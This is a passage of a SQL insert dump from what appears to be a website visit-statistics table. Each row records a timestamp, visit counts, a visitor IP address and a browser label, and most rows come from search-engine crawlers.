,'54.36.148.242','other'),(216276,1520355377,2,2,0,0,'141.8.142.74','other'),(216277,1520355438,1,1,0,0,'217.69.136.210','other'),(216278,1520355464,1,1,0,0,'188.230.43.254','other'),(216279,1520355466,1,1,0,0,'54.36.148.76','other'),(216280,1520355551,1,1,0,0,'54.36.148.96','other'),(216281,1520356451,1,1,0,0,'54.36.148.94','other'),(216282,1520356508,1,1,0,0,'54.36.149.64','other'),(216283,1520356557,1,0,1,0,'66.249.66.199',''),(216284,1520356587,1,1,0,0,'54.36.148.232','other'),(216285,1520356756,1,1,0,0,'66.249.66.199','chrome'),(216286,1520356760,1,1,0,0,'66.249.66.158','chrome'),(216287,1520356790,1,1,0,0,'54.36.148.17','other'),(216288,1520356846,3,3,0,0,'46.119.121.247','other'),(216289,1520357149,1,1,0,0,'54.36.148.10','other'),(216290,1520357290,1,1,0,0,'54.36.148.73','other'),(216291,1520357417,1,1,0,0,'54.36.148.86','other'),(216292,1520357680,2,2,0,0,'91.196.178.17','chrome'),(216293,1520357864,1,1,0,0,'188.230.43.254','other'),(216295,1520358885,1,1,0,0,'54.36.149.2','other'),(216296,1520358994,1,1,0,0,'8.29.198.26','other'),(216297,1520359001,1,1,0,0,'54.36.148.10','other'),(216298,1520359646,1,1,0,0,'54.36.149.30','other'),(216299,1520359724,1,1,0,0,'188.230.43.254','other'),(216300,1520360537,1,1,0,0,'178.154.171.88','other'),(216301,1520360836,1,1,0,0,'54.36.148.181','other'),(216302,1520361082,1,1,0,0,'54.36.148.149','other'),(216303,1520361233,1,1,0,0,'54.36.148.210','other'),(216304,1520361348,1,1,0,0,'217.69.133.224','other'),(216305,1520361440,1,1,0,0,'54.36.149.102','other'),(216306,1520361523,2,2,0,0,'178.154.171.88','other'),(216307,1520362065,1,1,0,0,'188.230.43.254','other'),(216308,1520362950,2,2,0,0,'91.196.178.168','chrome'),(216309,1520362960,1,1,0,0,'54.36.149.35','other'),(216310,1520363044,1,1,0,0,'178.154.171.4','other'),(216311,1520363110,1,1,0,0,'54.36.148.202','other'),(216312,1520363136,1,0,1,0,'66.249.66.195',''),(216313,1520363165,1,1,0,0,'54.36.149.104','other'),(216314,1520363251,1,0,1,0,'66.249.66.158',''),(216315,1520363310,1,1,0,0,'54.36.149.31','other'),(216316,1520363323,1,0,1,0,'66.249.66.201',''),(216317,1520363421,1,1,0,0,'66.249.66.199','chrome'),(216318,1520363432,1,1,0,0,'66.249.66.158','chrome'),(216319,1520363615,1,1,0,0,'54.36.148.126','other'),(216320,1520363632,1,1,0,0,'54.36.148.143','other'),(216321,1520363844,1,1,0,0,'93.72.41.79','chrome'),(216322,1520363990,1,1,0,0,'54.36.148.58','other'),(216323,1520364125,1,1,0,0,'54.36.149.78','other'),(216324,1520364619,1,1,0,0,'141.8.142.74','other'),(216325,1520364749,1,1,0,0,'217.69.133.193','other'),(216326,1520364971,1,1,0,0,'54.36.148.230','other'),(216327,1520365041,1,1,0,0,'54.36.148.155','other'),(216328,1520365180,1,1,0,0,'37.9.113.182','other'),(216329,1520365366,1,1,0,0,'54.36.149.87','other'),(216330,1520365606,1,1,0,0,'46.161.9.39','chrome'),(216331,1520365769,1,0,1,0,'66.249.66.201',''),(216332,1520366344,1,1,0,0,'54.36.148.173','other'),(216333,1520366419,1,1,0,0,'54.36.148.197','other'),(216334,1520366542,1,1,0,0,'91.196.178.129','chrome'),(216335,1520366583,1,1,0,0,'54.36.149.101','other'),(216336,1520366751,1,1,0,0,'54.36.149.55','other'),(216337,1520366758,1,1,0,0,'54.36.148.23','other'),(216338,1520366774,2,2,0,0,'216.244.66.237','other'),(216339,1520366810,1,1,0,0,'217.69.133.240','other'),(216340,1520366843,1,1,0,0,'54.36.149.58','other'),(216341,1520366898,1,1,0,0,'54.36.149.51','other'),(216342,1520367009,1,1,0,0,'178.154.171.88','other'),(216343,1520367646,1,1,0,0,'54.36.148.142','other'),(216344,1520367701,1,1,0,0,'66.249.66.74','chrome'),(216345,1520367704,1,1,0,0,'66.249.66.156','chrome'),(216346,1520367708,1,1,0,0,'54.36.148.129','other'),(216347,1520368097,1,1,0,0,'54.36.148.114','other'),(216348,1520368131,1,1,0,0,'141.8.132.19','other'),(216349,1520368547,1,0,1,0,'66.249.66.199',''),(216350,1520368549,1,0,1,0,'66.249.66.201',''),(216351,1520368629,1,1,0,0,'54.36.149.35','other'),(216352,1520368705,1,1,0,0,'87.250.224.46','other'),(216353,1520368753,1,0,1,0,'66.249.66.195',''),(216354,1520369090,1,1,0,0,'54.36.149.51','other'),(216355,1520369206,1,1,0,0,'54.36.148.191','other'),(216356,1520369454,1,1,0,0,'54.36.148.178','other'),(216357,1520369784,1,1,0,0,'54.36.148.16','other'),(216358,1520369825,2,2,0,0,'178.154.171.88','other'),(216359,1520369827,1,1,0,0,'87.250.224.46','other'),(216360,1520369855,1,1,0,0,'8.29.198.26','other'),(216361,1520370019,1,1,0,0,'54.36.149.28','other'),(216362,1520370079,2,2,0,0,'81.109.85.9','other'),(216363,1520370203,2,0,2,0,'66.249.66.195',''),(216364,1520370369,1,1,0,0,'54.36.148.221','other'),(216365,1520370450,1,1,0,0,'54.36.149.61','other'),(216366,1520370730,1,1,0,0,'18.231.178.73','firefox'),(216367,1520370736,1,1,0,0,'34.224.2.110','other'),(216368,1520370767,1,1,0,0,'213.180.203.8','other'),(216369,1520371117,1,0,1,0,'66.249.66.201',''),(216370,1520371478,1,1,0,0,'54.36.148.59','other'),(216371,1520371587,1,1,0,0,'46.161.9.39','firefox'),(216372,1520371657,1,0,1,0,'66.249.66.158',''),(216373,1520371742,1,1,0,0,'54.36.149.17','other'),(216374,1520372300,1,1,0,0,'18.231.178.73','firefox'),(216375,1520372327,2,2,0,0,'178.154.171.88','other'),(216376,1520372699,1,1,0,0,'5.45.207.83','other'),(216377,1520372935,1,1,0,0,'54.36.148.116','other'),(216378,1520372993,1,0,1,0,'66.249.66.199',''),(216379,1520373223,1,1,0,0,'54.36.148.250','other'),(216380,1520373273,1,1,0,0,'54.36.148.123','other'),(216381,1520373284,2,2,0,0,'87.250.224.46','other'),(216382,1520373673,1,1,0,0,'54.36.148.27','other'),(216383,1520374105,1,1,0,0,'93.73.80.121','chrome'),(216384,1520374202,1,1,0,0,'178.154.171.88','other'),(216385,1520374240,1,1,0,0,'66.249.66.195','chrome'),(216386,1520374476,1,1,0,0,'54.36.148.174','other'),(216387,1520374479,1,1,0,0,'54.36.148.127','other'),(216388,1520374713,1,1,0,0,'217.69.133.190','other'),(216389,1520374880,1,1,0,0,'54.36.148.60','other'),(216390,1520375012,1,1,0,0,'54.36.148.237','other'),(216391,1520375321,1,1,0,0,'54.36.148.12','other'),(216392,1520375645,1,1,0,0,'87.250.224.46','other'),(216393,1520375770,1,1,0,0,'217.69.133.59','other'),(216394,1520376123,1,1,0,0,'66.249.66.158','chrome'),(216395,1520376207,1,1,0,0,'34.224.2.110','other'),(216396,1520376221,1,0,1,0,'66.249.66.201',''),(216397,1520376247,1,1,0,0,'54.36.148.31','other'),(216398,1520376349,2,2,0,0,'178.154.171.88','other'),(216399,1520376377,1,1,0,0,'54.36.149.18','other'),(216400,1520376656,2,0,2,0,'66.249.66.195',''),(216401,1520376991,1,1,0,0,'87.250.224.46','other'),(216402,1520377034,1,1,0,0,'54.36.149.29','other'),(216403,1520377274,1,1,0,0,'66.249.66.201','chrome'),(216404,1520377298,1,1,0,0,'54.36.148.60','other'),(216405,1520377302,1,1,0,0,'178.154.171.88','other'),(216406,1520377736,4,4,0,0,'195.201.34.121','other'),(216407,1520377926,1,1,0,0,'54.165.59.7','other'),(216408,1520377980,1,1,0,0,'94.180.145.50','msie'),(216409,1520378212,1,0,1,0,'66.249.66.199',''),(216410,1520378740,1,1,0,0,'178.154.171.88','other'),(216411,1520378926,1,1,0,0,'217.69.133.68','other'),(216412,1520379511,1,1,0,0,'54.36.149.5','other'),(216413,1520379684,1,1,0,0,'54.36.148.247','other'),(216414,1520379727,1,1,0,0,'66.249.66.199','chrome'),(216415,1520380281,1,1,0,0,'217.69.133.232','other'),(216416,1520380387,1,1,0,0,'54.36.148.93','other'),(216417,1520380704,1,1,0,0,'8.29.198.25','other'),(216418,1520380713,1,1,0,0,'54.36.149.75','other'),(216419,1520380764,1,1,0,0,'54.36.148.24','other'),(216420,1520381054,1,0,1,0,'66.249.66.158',''),(216421,1520381185,1,1,0,0,'54.36.148.174','other'),(216422,1520381462,1,1,0,0,'66.249.66.157','chrome'),(216423,1520381504,1,1,0,0,'54.36.148.173','other'),(216424,1520381688,1,1,0,0,'217.69.133.236','other'),(216425,1520381718,1,1,0,0,'54.36.149.38','other'),(216426,1520381935,1,1,0,0,'54.36.149.73','other'),(216427,1520382199,1,0,1,0,'66.249.66.195',''),(216428,1520382293,1,1,0,0,'54.36.148.246','other'),(216429,1520382402,1,1,0,0,'217.69.133.218','other'),(216430,1520382904,1,1,0,0,'54.36.148.63','other'),(216431,1520382912,1,0,1,0,'66.249.66.201',''),(216432,1520382955,1,1,0,0,'54.36.148.62','other'),(216433,1520383118,1,1,0,0,'54.36.148.114','other'),(216434,1520383149,1,1,0,0,'54.36.148.70','other'),(216435,1520383421,1,1,0,0,'217.69.133.190','other'),(216436,1520383871,1,1,0,0,'54.36.148.17','other'),(216437,1520383989,1,1,0,0,'54.36.148.150','other'),(216438,1520384062,1,1,0,0,'54.36.148.146','other'),(216439,1520384224,1,0,1,0,'66.249.66.158',''),(216440,1520384387,1,1,0,0,'54.36.149.68','other'),(216441,1520384394,1,1,0,0,'54.36.148.113','other'),(216442,1520384538,1,1,0,0,'217.69.133.235','other'),(216443,1520384634,1,1,0,0,'54.36.149.67','other'),(216444,1520384788,1,1,0,0,'54.36.148.246','other'),(216445,1520384810,1,1,0,0,'66.249.66.195','chrome'),(216446,1520385560,2,2,0,0,'141.8.132.19','other'),(216447,1520385591,2,2,0,0,'87.250.224.46','other'),(216448,1520385613,1,0,1,0,'66.249.66.199',''),(216449,1520385930,1,1,0,0,'54.36.149.97','other'),(216450,1520386068,1,1,0,0,'54.36.148.208','other'),(216451,1520386178,1,1,0,0,'54.36.148.160','other'),(216452,1520386316,1,0,1,0,'66.249.66.201',''),(216453,1520386482,1,1,0,0,'54.36.149.28','other'),(216454,1520386603,1,1,0,0,'54.36.149.95','other'),(216455,1520386656,1,1,0,0,'54.36.148.30','other'),(216456,1520386795,1,1,0,0,'66.249.66.156','chrome'),(216457,1520387025,1,1,0,0,'141.8.132.19','other'),(216458,1520387044,1,1,0,0,'54.36.148.66','other'),(216459,1520387156,1,0,1,0,'66.249.66.195',''),(216460,1520387385,1,1,0,0,'95.132.20.7','other'),(216461,1520388343,1,1,0,0,'178.154.171.60','other'),(216462,1520388350,2,2,0,0,'141.8.132.19','other'),(216463,1520388806,1,1,0,0,'54.36.148.146','other'),(216464,1520388966,1,1,0,0,'54.36.148.107','other'),(216465,1520389048,1,1,0,0,'52.3.247.79','other'),(216466,1520389328,1,1,0,0,'157.55.39.213','other'),(216467,1520389678,1,1,0,0,'54.36.148.182','other'),(216468,1520389751,1,1,0,0,'54.36.149.7','other'),(216469,1520389810,1,0,1,0,'66.249.66.158',''),(216470,1520390034,1,1,0,0,'52.3.247.79','other'),(216471,1520390053,1,1,0,0,'54.36.148.213','other'),(216472,1520390185,1,1,0,0,'54.36.148.35','other'),(216473,1520390211,1,1,0,0,'66.249.66.199','chrome'),(216474,1520390383,1,1,0,0,'54.36.149.38','other'),(216475,1520390525,1,1,0,0,'87.250.224.96','other'),(216476,1520390584,1,1,0,0,'54.36.149.30','other'),(216477,1520390613,1,1,0,0,'54.36.148.167','other'),(216478,1520390805,1,1,0,0,'54.36.148.91','other'),(216479,1520390909,1,1,0,0,'54.36.148.149','other'),(216480,1520391020,1,1,0,0,'52.3.247.79','other'),(216481,1520391028,1,1,0,0,'217.69.136.208','other'),(216482,1520391279,1,1,0,0,'141.8.132.19','other'),(216483,1520391490,1,1,0,0,'54.36.149.96','other'),(216484,1520391547,1,1,0,0,'8.29.198.26','other'),(216485,1520391563,1,1,0,0,'54.36.149.9','other'),(216486,1520391593,1,1,0,0,'54.36.148.195','other'),(216487,1520391895,1,1,0,0,'54.36.148.101','other'),(216488,1520391964,1,1,0,0,'178.154.171.88','other'),(216489,1520392024,1,1,0,0,'52.3.247.79','other'),(216490,1520392635,1,1,0,0,'66.249.66.158','chrome'),(216491,1520392659,1,1,0,0,'54.36.148.107','other'),(216492,1520392794,1,1,0,0,'54.36.149.22','other'),(216493,1520392941,1,1,0,0,'54.36.148.153','other'),(216494,1520393011,1,1,0,0,'52.3.247.79','other'),(216495,1520393211,1,1,0,0,'54.36.149.29','other'),(216496,1520393367,1,1,0,0,'54.36.149.36','other'),(216497,1520393381,1,1,0,0,'54.36.148.214','other'),(216498,1520393546,1,1,0,0,'54.36.148.64','other'),(216499,1520393559,1,1,0,0,'54.36.148.96','other'),(216500,1520393803,1,1,0,0,'54.36.148.124','other'),(216501,1520393962,1,1,0,0,'5.9.156.74','other'),(216502,1520393963,1,1,0,0,'52.3.247.79','other'),(216503,1520394069,1,1,0,0,'54.36.148.110','other'),(216504,1520394101,1,1,0,0,'54.36.149.60','other'),(216505,1520394431,1,1,0,0,'45.77.24.16','firefox'),(216506,1520394461,1,1,0,0,'54.36.149.23','other'),(216507,1520394520,1,1,0,0,'87.250.224.39','other'),(216508,1520394648,1,1,0,0,'217.69.133.216','other'),(216509,1520394842,2,2,0,0,'157.55.39.74','other'),(216510,1520394893,1,1,0,0,'52.3.247.79','other'),(216511,1520394977,1,1,0,0,'178.154.171.60','other'),(216512,1520394979,1,1,0,0,'54.36.148.242','other'),(216513,1520394997,1,1,0,0,'54.36.148.232','other'),(216514,1520395020,2,2,0,0,'178.154.171.88','other'),(216515,1520395398,1,1,0,0,'157.55.39.213','other'),(216516,1520395441,1,1,0,0,'54.36.148.180','other'),(216517,1520395669,1,1,0,0,'54.36.149.99','other'),(216518,1520395723,1,1,0,0,'54.36.148.97','other'),(216519,1520395814,1,1,0,0,'52.3.247.79','other'),(216520,1520395946,1,1,0,0,'54.36.149.85','other'),(216521,1520395991,1,1,0,0,'54.36.148.195','other'),(216522,1520396604,1,1,0,0,'54.36.149.47','other'),(216523,1520396712,1,1,0,0,'87.250.224.46','other'),(216524,1520396744,1,1,0,0,'54.36.148.64','other'),(216525,1520396765,1,1,0,0,'217.69.133.250','other'),(216526,1520396773,1,1,0,0,'52.3.247.79','other'),(216527,1520396851,1,1,0,0,'54.36.148.21','other'),(216528,1520396962,1,1,0,0,'54.36.149.79','other'),(216529,1520397064,1,1,0,0,'178.154.171.88','other'),(216530,1520397571,1,1,0,0,'157.55.39.36','other'),(216531,1520397740,1,1,0,0,'54.36.148.161','other'),(216532,1520397746,1,1,0,0,'54.36.148.92','other'),(216533,1520397771,1,1,0,0,'54.36.148.229','other'),(216534,1520397803,1,1,0,0,'52.3.247.79','other'),(216535,1520398029,1,1,0,0,'217.69.136.210','other'),(216536,1520398406,1,1,0,0,'54.36.148.88','other'),(216537,1520398604,1,1,0,0,'45.77.24.16','firefox'),(216538,1520398780,1,1,0,0,'52.3.247.79','other'),(216539,1520399316,1,1,0,0,'217.69.133.67','other'),(216540,1520399531,1,1,0,0,'54.36.149.99','other'),(216541,1520399712,1,1,0,0,'54.36.149.54','other'),(216542,1520399742,1,1,0,0,'54.36.148.139','other'),(216543,1520399768,1,1,0,0,'54.36.148.149','other'),(216544,1520399778,1,1,0,0,'54.36.148.144','other'),(216545,1520399988,1,1,0,0,'52.3.247.79','other'),(216546,1520400039,1,1,0,0,'54.36.148.30','other'),(216547,1520400197,2,2,0,0,'178.154.171.88','other'),(216548,1520400298,2,2,0,0,'54.36.148.244','other'),(216549,1520400391,1,1,0,0,'54.36.149.26','other'),(216550,1520400553,1,1,0,0,'54.36.148.252','other'),(216551,1520401238,1,1,0,0,'54.36.149.92','other'),(216552,1520401272,1,1,0,0,'54.36.149.51','other'),(216553,1520401460,1,1,0,0,'54.36.149.67','other'),(216554,1520401626,1,1,0,0,'54.36.148.53','other'),(216555,1520402042,1,1,0,0,'34.224.2.110','other'),(216556,1520402145,1,1,0,0,'54.36.148.226','other'),(216557,1520402203,1,1,0,0,'188.230.43.254','other'),(216558,1520402256,1,1,0,0,'54.36.148.248','other'),(216559,1520402390,1,1,0,0,'8.29.198.25','other'),(216560,1520402476,2,2,0,0,'178.151.245.174','other'),(216561,1520402528,2,2,0,0,'77.111.244.68','chrome'),(216562,1520402668,1,1,0,0,'54.36.148.175','other'),(216563,1520402751,1,1,0,0,'54.36.148.142','other'),(216564,1520402916,1,1,0,0,'54.36.149.86','other'),(216565,1520402957,1,1,0,0,'54.36.148.116','other'),(216566,1520402973,1,1,0,0,'217.69.136.203','other'),(216567,1520403187,1,1,0,0,'54.36.148.26','other'),(216568,1520403396,1,1,0,0,'54.36.148.107','other'),(216569,1520403461,1,1,0,0,'52.3.247.79','other'),(216570,1520403590,1,1,0,0,'54.36.148.203','other'),(216571,1520403687,1,1,0,0,'54.36.148.34','other'),(216572,1520403756,1,1,0,0,'34.224.2.110','other'),(216573,1520403927,1,1,0,0,'54.36.149.93','other'),(216574,1520404386,1,1,0,0,'54.36.148.47','other'),(216575,1520404392,1,1,0,0,'52.3.247.79','other'),(216576,1520404626,1,1,0,0,'188.230.43.254','other'),(216577,1520405006,1,1,0,0,'54.36.148.113','other'),(216578,1520405232,1,1,0,0,'54.36.148.49','other'),(216579,1520405273,1,1,0,0,'54.36.148.38','other'),(216580,1520405276,1,1,0,0,'54.36.148.139','other'),(216581,1520405341,1,0,1,0,'66.249.66.201',''),(216582,1520405347,2,2,0,0,'157.55.39.248','other'),(216583,1520405382,1,1,0,0,'52.3.247.79','other'),(216584,1520405413,1,1,0,0,'54.36.148.33','other'),(216585,1520405651,1,1,0,0,'54.36.148.185','other'),(216586,1520405747,1,1,0,0,'54.36.148.131','other'),(216587,1520405890,1,1,0,0,'54.36.149.28','other'),(216588,1520406015,1,1,0,0,'54.36.149.52','other'),(216589,1520406096,1,1,0,0,'54.36.148.39','other'),(216590,1520406385,1,1,0,0,'52.3.247.79','other'),(216591,1520406725,1,1,0,0,'54.36.148.120','other'),(216592,1520406771,1,0,1,0,'66.249.66.199',''),(216593,1520407468,1,1,0,0,'52.3.247.79','other'),(216594,1520407520,1,1,0,0,'178.154.171.88','other'),(216595,1520407687,1,1,0,0,'54.36.148.120','other'),(216596,1520407917,1,1,0,0,'54.36.148.112','other'),(216597,1520408042,1,0,1,0,'66.249.66.195',''),(216598,1520408405,1,1,0,0,'52.3.247.79','other'),(216599,1520408411,1,0,1,0,'66.249.66.158',''),(216600,1520408419,1,1,0,0,'66.249.66.195','chrome'),(216601,1520408420,1,1,0,0,'54.36.148.146','other'),(216602,1520408516,1,1,0,0,'66.249.66.157','chrome'),(216603,1520408619,1,1,0,0,'54.36.148.220','other'),(216604,1520408934,1,1,0,0,'54.36.148.166','other'),(216605,1520409054,1,1,0,0,'217.69.136.210','other'),(216606,1520409169,4,4,0,0,'91.196.178.80','chrome'),(216607,1520409228,1,1,0,0,'54.36.148.22','other'),(216608,1520409491,1,1,0,0,'66.249.66.201','chrome'),(216609,1520409581,1,1,0,0,'52.3.247.79','other'),(216610,1520409667,1,1,0,0,'217.69.133.243','other'),(216611,1520409711,1,1,0,0,'54.36.148.200','other'),(216612,1520409792,1,1,0,0,'54.36.148.128','other'),(216613,1520409797,1,1,0,0,'54.36.148.76','other'),(216614,1520410521,1,1,0,0,'37.52.78.173','chrome'),(216615,1520410694,1,1,0,0,'52.3.247.79','other'),(216616,1520410807,1,1,0,0,'54.36.149.10','other'),(216617,1520410931,1,1,0,0,'54.36.149.88','other'),(216618,1520411252,1,1,0,0,'54.36.148.74','other'),(216619,1520411254,1,1,0,0,'91.196.178.104','chrome'),(216620,1520411340,1,1,0,0,'54.36.149.46','other'),(216621,1520411380,1,1,0,0,'141.8.142.74','other'),(216622,1520411718,1,1,0,0,'54.36.149.59','other'),(216623,1520411866,1,0,1,0,'66.249.66.201',''),(216624,1520412277,1,1,0,0,'54.36.148.201','other'),(216625,1520412667,1,1,0,0,'157.55.39.36','other'),(216626,1520412981,1,1,0,0,'54.36.148.233','other'),(216627,1520413116,1,1,0,0,'54.36.148.103','other'),(216628,1520413155,1,1,0,0,'54.36.148.159','other'),(216629,1520413190,1,1,0,0,'54.36.149.14','other'),(216630,1520413235,1,1,0,0,'54.36.149.69','other'),(216631,1520413237,1,1,0,0,'8.29.198.26','other'),(216632,1520413249,1,1,0,0,'52.3.247.79','other'),(216633,1520413267,2,2,0,0,'195.230.119.34','chrome'),(216634,1520413275,1,1,0,0,'54.36.148.239','other'),(216635,1520413341,1,1,0,0,'54.36.148.240','other'),(216636,1520413438,1,1,0,0,'217.69.133.23','other'),(216637,1520413468,1,1,0,0,'54.36.148.139','other'),(216638,1520413915,1,1,0,0,'54.36.148.59','other'),(216639,1520413978,2,2,0,0,'46.200.74.26','chrome'),(216640,1520414032,1,1,0,0,'54.36.148.48','other'),(216641,1520414298,1,1,0,0,'52.3.247.79','other'),(216642,1520414492,1,1,0,0,'95.135.12.252','chrome'),(216643,1520414564,1,1,0,0,'91.196.178.104','chrome'),(216644,1520414654,1,1,0,0,'157.55.39.213','other'),(216645,1520414781,1,1,0,0,'54.36.148.170','other'),(216646,1520414890,1,1,0,0,'89.163.206.215','chrome'),(216647,1520415171,1,1,0,0,'54.36.149.86','other'),(216648,1520415217,1,1,0,0,'54.36.148.167','other'),(216649,1520415433,1,1,0,0,'52.3.247.79','other'),(216650,1520415453,1,0,1,0,'66.249.66.201',''),(216651,1520415733,1,0,1,0,'66.249.66.158',''),(216652,1520415744,1,1,0,0,'66.249.66.199','chrome'),(216653,1520415795,1,1,0,0,'66.249.66.158','chrome'),(216654,1520416114,1,1,0,0,'54.36.148.206','other'),(216655,1520416526,1,1,0,0,'94.231.188.10','chrome'),(216656,1520416644,1,1,0,0,'52.3.247.79','other'),(216657,1520416660,1,1,0,0,'54.36.148.196','other'),(216658,1520416842,1,1,0,0,'54.36.148.144','other'),(216659,1520417033,1,1,0,0,'91.196.178.104','chrome'),(216660,1520417312,1,1,0,0,'54.36.149.69','other'),(216661,1520417435,1,1,0,0,'141.8.142.74','other'),(216662,1520417446,1,1,0,0,'54.36.148.203','other'),(216663,1520417689,1,1,0,0,'52.3.247.79','other'),(216664,1520417712,1,1,0,0,'54.36.149.96','other'),(216665,1520417784,3,3,0,0,'91.196.177.15','chrome'),(216666,1520417831,1,1,0,0,'92.112.216.34','chrome'),(216667,1520417922,1,1,0,0,'54.36.148.186','other'),(216668,1520417999,1,1,0,0,'217.69.133.251','other'),(216669,1520418151,1,1,0,0,'77.111.244.34','chrome'),(216670,1520418244,1,1,0,0,'54.36.149.73','other'),(216671,1520418405,1,1,0,0,'54.36.149.54','other'),(216672,1520418425,1,1,0,0,'141.8.142.74','other'),(216673,1520418515,1,1,0,0,'54.36.149.10','other'),(216674,1520418588,1,1,0,0,'217.69.133.30','other'),(216675,1520418665,2,2,0,0,'91.196.178.104','chrome'),(216676,1520418684,1,1,0,0,'54.36.148.227','other'),(216677,1520418767,1,1,0,0,'178.154.171.88','other'),(216678,1520418778,1,1,0,0,'54.36.148.146','other'),(216679,1520418854,1,1,0,0,'54.36.149.60','other'),(216680,1520418981,1,1,0,0,'54.36.148.115','other'),(216681,1520419410,1,0,1,0,'66.249.66.195',''),(216682,1520419412,1,1,0,0,'54.36.148.219','other'),(216683,1520419494,1,1,0,0,'54.36.148.220','other'),(216684,1520419761,1,1,0,0,'54.36.148.176','other'),(216685,1520419849,1,1,0,0,'54.36.148.228','other'),(216686,1520419925,1,1,0,0,'52.3.247.79','other'),(216687,1520420051,1,1,0,0,'54.36.148.221','other'),(216688,1520420075,1,1,0,0,'54.36.148.50','other'),(216689,1520420314,1,1,0,0,'54.36.148.186','other'),(216690,1520420685,1,1,0,0,'66.249.66.158','chrome'),(216691,1520420751,1,1,0,0,'54.36.148.143','other'),(216692,1520420932,1,1,0,0,'54.36.148.129','other'),(216693,1520421018,1,1,0,0,'52.3.247.79','other'),(216694,1520421057,1,1,0,0,'54.36.148.118','other'),(216695,1520421104,1,1,0,0,'54.36.148.104','other'),(216696,1520421243,2,2,0,0,'54.36.148.253','other'),(216697,1520421341,2,2,0,0,'87.250.224.46','other'),(216698,1520421438,1,1,0,0,'54.36.148.21','other'),(216699,1520421641,1,0,1,0,'66.249.66.195',''),(216700,1520422046,1,1,0,0,'54.36.148.255','other'),(216701,1520422061,1,1,0,0,'54.36.148.162','other'),(216702,1520422075,1,1,0,0,'54.36.148.168','other'),(216703,1520422108,1,1,0,0,'52.3.247.79','other'),(216704,1520422303,1,1,0,0,'81.171.19.177','chrome'),(216705,1520422496,1,1,0,0,'66.249.66.201','chrome'),(216706,1520422539,1,1,0,0,'66.249.66.158','chrome'),(216707,1520422999,1,1,0,0,'91.196.178.165','chrome'),(216708,1520423025,1,1,0,0,'54.36.149.85','other'),(216709,1520423084,1,1,0,0,'54.36.148.205','other'),(216710,1520423138,1,1,0,0,'54.36.148.88','other'),(216711,1520423188,1,1,0,0,'95.134.97.244','chrome'),(216712,1520423231,2,2,0,0,'141.8.142.74','other'),(216713,1520423466,1,1,0,0,'54.36.148.222','other'),(216714,1520423605,3,3,0,0,'92.113.188.43','chrome'),(216715,1520423643,1,1,0,0,'185.110.134.20','chrome'),(216716,1520423851,1,1,0,0,'54.36.148.52','other'),(216717,1520424058,1,1,0,0,'54.36.149.0','other'),(216718,1520424088,1,1,0,0,'52.3.247.79','other'),(216719,1520424093,1,1,0,0,'8.29.198.27','other'),(216720,1520424305,1,1,0,0,'54.36.148.42','other'),(216721,1520424376,1,1,0,0,'54.36.148.216','other'),(216722,1520424558,1,1,0,0,'54.36.148.206','other'),(216723,1520424643,1,1,0,0,'217.69.133.12','other'),(216724,1520424703,1,1,0,0,'54.36.149.14','other'),(216725,1520424753,1,1,0,0,'54.36.148.143','other'),(216726,1520425044,1,1,0,0,'54.36.148.68','other'),(216727,1520425073,1,1,0,0,'54.36.148.24','other'),(216728,1520425113,1,1,0,0,'141.8.142.74','other'),(216729,1520425343,1,1,0,0,'54.36.148.116','other'),(216730,1520425654,1,1,0,0,'217.69.133.216','other'),(216731,1520425717,1,1,0,0,'54.36.148.235','other'),(216732,1520425853,1,1,0,0,'54.36.148.16','other'),(216733,1520425899,1,1,0,0,'54.36.148.192','other'),(216734,1520425937,1,1,0,0,'54.36.148.115','other'),(216735,1520426007,1,1,0,0,'54.36.148.62','other'),(216736,1520426090,2,2,0,0,'141.8.142.74','other'),(216737,1520426117,1,1,0,0,'54.36.148.212','other'),(216738,1520426207,1,1,0,0,'54.36.149.104','other'),(216739,1520426238,2,2,0,0,'91.196.178.80','chrome'),(216740,1520426797,1,1,0,0,'54.36.149.25','other'),(216741,1520427003,2,2,0,0,'91.196.178.164','chrome'),(216742,1520427048,1,1,0,0,'54.36.149.56','other'),(216743,1520427057,1,1,0,0,'52.3.247.79','other'),(216744,1520427107,1,1,0,0,'217.69.136.205','other'),(216745,1520427224,1,1,0,0,'34.224.2.110','other'),(216746,1520427242,1,0,1,0,'66.249.66.199',''),(216747,1520427298,1,1,0,0,'217.69.136.207','other'),(216748,1520427305,1,1,0,0,'217.69.133.18','other'),(216749,1520427346,1,1,0,0,'54.36.149.85','other'),(216750,1520427373,1,1,0,0,'141.8.142.74','other'),(216751,1520427656,1,1,0,0,'54.36.148.192','other'),(216752,1520427716,1,1,0,0,'54.36.148.216','other'),(216753,1520427837,1,1,0,0,'54.36.148.242','other'),(216754,1520428152,1,1,0,0,'54.36.149.60','other'),(216755,1520428176,1,1,0,0,'34.224.2.110','other'),(216756,1520428576,1,1,0,0,'54.36.149.38','other'),(216757,1520428926,1,1,0,0,'54.36.148.140','other'),(216758,1520429197,1,1,0,0,'54.36.148.225','other'),(216759,1520429474,1,1,0,0,'54.36.148.234','other'),(216760,1520429508,1,1,0,0,'34.224.2.110','other'),(216761,1520429585,1,1,0,0,'54.36.148.207','other'),(216762,1520429900,2,2,0,0,'178.154.171.88','other'),(216763,1520429911,2,2,0,0,'141.8.142.74','other'),(216764,1520430125,1,1,0,0,'54.36.149.74','other'),(216765,1520430420,1,1,0,0,'34.224.2.110','other'),(216766,1520430449,1,1,0,0,'87.250.224.46','other'),(216767,1520430702,1,1,0,0,'54.36.149.90','other'),(216768,1520430720,1,1,0,0,'157.55.39.213','other'),(216769,1520430753,1,1,0,0,'91.196.178.54','chrome'),(216770,1520430759,1,1,0,0,'54.36.148.161','other'),(216771,1520430781,1,1,0,0,'54.36.148.49','other'),(216772,1520431047,1,1,0,0,'54.36.149.35','other'),(216773,1520431121,1,1,0,0,'52.3.247.79','other'),(216774,1520431132,1,1,0,0,'54.36.149.80','other'),(216775,1520431213,1,0,1,0,'66.249.66.156',''),(216776,1520431264,1,0,1,0,'66.249.66.201',''),(216777,1520431378,1,1,0,0,'34.224.2.110','other'),(216778,1520431638,1,1,0,0,'54.36.148.213','other'),(216779,1520431676,1,1,0,0,'66.249.66.156','chrome'),(216780,1520431680,1,1,0,0,'54.36.148.143','other'),(216781,1520431691,1,1,0,0,'66.249.66.74','chrome'),(216782,1520431943,1,1,0,0,'157.55.39.36','other'),(216783,1520432001,1,1,0,0,'54.36.148.140','other'),(216784,1520432048,1,1,0,0,'141.8.142.74','other'),(216785,1520432083,1,1,0,0,'54.36.148.91','other'),(216786,1520432171,1,1,0,0,'52.3.247.79','other'),(216787,1520432485,1,1,0,0,'54.36.148.212','other'),(216788,1520432573,2,2,0,0,'144.76.138.165','other'),(216789,1520432609,1,1,0,0,'87.250.224.46','other'),(216790,1520432845,1,1,0,0,'54.36.148.251'